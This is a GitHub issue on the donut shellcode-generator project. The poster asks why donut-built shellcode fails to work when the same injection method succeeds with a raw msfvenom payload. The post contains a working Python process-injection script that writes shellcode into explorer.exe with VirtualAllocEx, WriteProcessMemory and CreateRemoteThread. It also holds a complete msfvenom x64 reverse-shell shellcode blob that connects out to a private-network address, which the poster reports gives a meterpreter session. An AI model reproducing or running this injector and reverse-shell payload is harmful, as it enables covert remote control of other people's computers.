search

TheWover / donut

Generates x86, x64, or AMD64+x86 position-independent shellcode that loads .NET Assemblies, PE files, and other Windows payloads from memory and runs them with parameters
BSD 3-Clause "New" or "Revised" License
3.53k stars 628 forks source link

shellcode gen with error? #134

Closed SirKnightV closed 4 months ago

SirKnightV commented 1 year ago

Hi, This is the Code i'm testing,

import ctypes, os, subprocess
import psutil
prq = psutil.process_iter()
for proceso in prq:
    if proceso.name() == 'explorer.exe':
        pix = proceso.pid
    else:
        pass
shellcode = open('loader.bin', 'rb').read()
shellcode_length = len(shellcode)
process_handle = ctypes.windll.kernel32.OpenProcess(0xFFFF, False, pix)
memory_allocation_variable = ctypes.windll.kernel32.VirtualAllocEx(process_handle, 0, shellcode_length, 0x00001000, 0x40)
ctypes.windll.kernel32.WriteProcessMemory(process_handle, memory_allocation_variable, shellcode, shellcode_length, 0)
ctypes.windll.kernel32.CreateRemoteThread(process_handle, None, 0, memory_allocation_variable, 0, 0, 0)

The Shellcode in loader.bin i have generated it downloading in Releases the last version of donut, later i have executed the next command

donut.exe -i msfvenompayload.exe -f bin -o loader.bin

later i have try to execute this code, but i dont get any error, just restart explorer.exe process , i have checked the api parameters at https://learn.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights and https://learn.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-virtualalloc for make sure all seems correctly, but when i try execute just dont show any error just restart explorer.exe process, but, if i gen shellcode directly from msfvenom and load it like this

shellcode =  b""
shellcode += b"\xfc\x48\x83\xe4\xf0\xe8\xcc\x00\x00\x00\x41\x51"
shellcode += b"\x41\x50\x52\x51\x48\x31\xd2\x56\x65\x48\x8b\x52"
shellcode += b"\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x0f\xb7"
shellcode += b"\x4a\x4a\x4d\x31\xc9\x48\x8b\x72\x50\x48\x31\xc0"
shellcode += b"\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
shellcode += b"\x01\xc1\xe2\xed\x52\x48\x8b\x52\x20\x41\x51\x8b"
shellcode += b"\x42\x3c\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x0f"
shellcode += b"\x85\x72\x00\x00\x00\x8b\x80\x88\x00\x00\x00\x48"
shellcode += b"\x85\xc0\x74\x67\x48\x01\xd0\x44\x8b\x40\x20\x8b"
shellcode += b"\x48\x18\x49\x01\xd0\x50\xe3\x56\x48\xff\xc9\x4d"
shellcode += b"\x31\xc9\x41\x8b\x34\x88\x48\x01\xd6\x48\x31\xc0"
shellcode += b"\x41\xc1\xc9\x0d\xac\x41\x01\xc1\x38\xe0\x75\xf1"
shellcode += b"\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44"
shellcode += b"\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44"
shellcode += b"\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x41\x58"
shellcode += b"\x48\x01\xd0\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
shellcode += b"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41"
shellcode += b"\x59\x5a\x48\x8b\x12\xe9\x4b\xff\xff\xff\x5d\x49"
shellcode += b"\xbe\x77\x73\x32\x5f\x33\x32\x00\x00\x41\x56\x49"
shellcode += b"\x89\xe6\x48\x81\xec\xa0\x01\x00\x00\x49\x89\xe5"
shellcode += b"\x49\xbc\x02\x00\x11\x5c\xc0\xa8\x03\x7d\x41\x54"
shellcode += b"\x49\x89\xe4\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07"
shellcode += b"\xff\xd5\x4c\x89\xea\x68\x01\x01\x00\x00\x59\x41"
shellcode += b"\xba\x29\x80\x6b\x00\xff\xd5\x6a\x0a\x41\x5e\x50"
shellcode += b"\x50\x4d\x31\xc9\x4d\x31\xc0\x48\xff\xc0\x48\x89"
shellcode += b"\xc2\x48\xff\xc0\x48\x89\xc1\x41\xba\xea\x0f\xdf"
shellcode += b"\xe0\xff\xd5\x48\x89\xc7\x6a\x10\x41\x58\x4c\x89"
shellcode += b"\xe2\x48\x89\xf9\x41\xba\x99\xa5\x74\x61\xff\xd5"
shellcode += b"\x85\xc0\x74\x0a\x49\xff\xce\x75\xe5\xe8\x93\x00"
shellcode += b"\x00\x00\x48\x83\xec\x10\x48\x89\xe2\x4d\x31\xc9"
shellcode += b"\x6a\x04\x41\x58\x48\x89\xf9\x41\xba\x02\xd9\xc8"
shellcode += b"\x5f\xff\xd5\x83\xf8\x00\x7e\x55\x48\x83\xc4\x20"
shellcode += b"\x5e\x89\xf6\x6a\x40\x41\x59\x68\x00\x10\x00\x00"
shellcode += b"\x41\x58\x48\x89\xf2\x48\x31\xc9\x41\xba\x58\xa4"
shellcode += b"\x53\xe5\xff\xd5\x48\x89\xc3\x49\x89\xc7\x4d\x31"
shellcode += b"\xc9\x49\x89\xf0\x48\x89\xda\x48\x89\xf9\x41\xba"
shellcode += b"\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x28\x58"
shellcode += b"\x41\x57\x59\x68\x00\x40\x00\x00\x41\x58\x6a\x00"
shellcode += b"\x5a\x41\xba\x0b\x2f\x0f\x30\xff\xd5\x57\x59\x41"
shellcode += b"\xba\x75\x6e\x4d\x61\xff\xd5\x49\xff\xce\xe9\x3c"
shellcode += b"\xff\xff\xff\x48\x01\xc3\x48\x29\xc6\x48\x85\xf6"
shellcode += b"\x75\xb4\x41\xff\xe7\x58\x6a\x00\x59\x49\xc7\xc2"
shellcode += b"\xf0\xb5\xa2\x56\xff\xd5"

import ctypes, os, subprocess
import psutil
prq = psutil.process_iter()
for proceso in prq:
    if proceso.name() == 'explorer.exe':
        pix = proceso.pid
    else:
        pass
shellcode_length = len(shellcode)
process_handle = ctypes.windll.kernel32.OpenProcess(0xFFFF, False, pix)
memory_allocation_variable = ctypes.windll.kernel32.VirtualAllocEx(process_handle, 0, shellcode_length, 0x00001000, 0x40)
ctypes.windll.kernel32.WriteProcessMemory(process_handle, memory_allocation_variable, shellcode, shellcode_length, 0)
ctypes.windll.kernel32.CreateRemoteThread(process_handle, None, 0, memory_allocation_variable, 0, 0, 0)

when i execute this code it give me meterpreter session , but with the donut shellcode gen no, what is wrong? is me or is donut tool who are bad?, i hope someone can help me to fix this, thanks :) Note: When i try to generate donut shellcode with -f 5 for python file output and try load i get same issue restarting explorer.exe process but no handler receiving.